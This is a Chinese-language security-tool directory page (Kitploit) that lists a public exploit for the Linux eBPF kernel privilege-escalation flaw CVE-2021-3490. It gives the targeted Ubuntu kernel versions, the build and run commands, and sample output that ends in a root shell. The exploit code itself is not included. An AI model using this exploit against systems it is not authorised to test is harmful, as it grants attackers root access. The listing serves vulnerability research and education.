Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Linux_LPE_eBPF_CVE-2021-3490 — 基于eBPF的Linux内核本地权限提升漏洞利用,针对CVE-2021-3490。在易受攻击的Ubuntu内核5.8.0-25至5.11.0-16上提供root shell访问。 | Kitploit
工具/GitHubGitHub/chompie1337/linux_lpe_ebpf_cve-2021-3490
权限提升漏洞分析漏洞利用学习与教育二进制利用
GitHubchompie1337/linux_lpe_ebpf_cve-2021-3490

Linux_LPE_eBPF_CVE-2021-3490

基于eBPF的Linux内核本地权限提升漏洞利用,针对CVE-2021-3490。在易受攻击的Ubuntu内核5.8.0-25至5.11.0-16上提供root shell访问。

查看仓库

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
3174823年前Kitploit 审核通过

Linux_LPE_eBPF_CVE-2021-3490

针对 CVE-2021-3490 的 LPE 漏洞利用程序。已在 Ubuntu 20.04.02 和 20.10 (Groovy Gorilla) 内核 5.8.0-25.26 至 5.8.0-52.58 上测试, 以及 Ubuntu 21.04 (Hirsute Hippo) 5.11.0-16.17。 该漏洞由 Manfred Paul @_manfp 发现,并在本次提交中修复。

作者:@chompie1337

仅供教育/研究使用。风险自负。

用法:

针对 Ubuntu 20.04.02 和 Ubuntu 20.10 (Groovy Gorilla) 构建:

root@kitploit:~
make groovy

针对 Ubuntu 21.04 (Hirsute Hippo) 构建:

root@kitploit:~
make hirsute

运行:

root@kitploit:~
bin/exploit.bin
[+] eBPF enabled, maps created!
[+] addr of oob BPF array map: ffffa008c1202110
[+] addr of array_map_ops: ffffffff956572a0
[+] kernel read successful!
[!] searching for init_pid_ns in kstrtab ...
[+] addr of init_pid_ns in kstrtab: ffffffff95b03a4a
[!] searching for init_pid_ns in ksymtab...
[+] addr of init_pid_ns ffffffff96062d00
[!] searching for creds for pid: 770
[+] addr of cred structure: ffffa0086758dec0
[!] preparing to overwrite creds...
[+] success! enjoy r00t :)
#

注意:你必须通过输入 exit 干净地退出 root shell,以执行清理并避免内核崩溃。

查看漏洞分析文章 Kernel Pwning with eBPF: a Love Story。

下载工具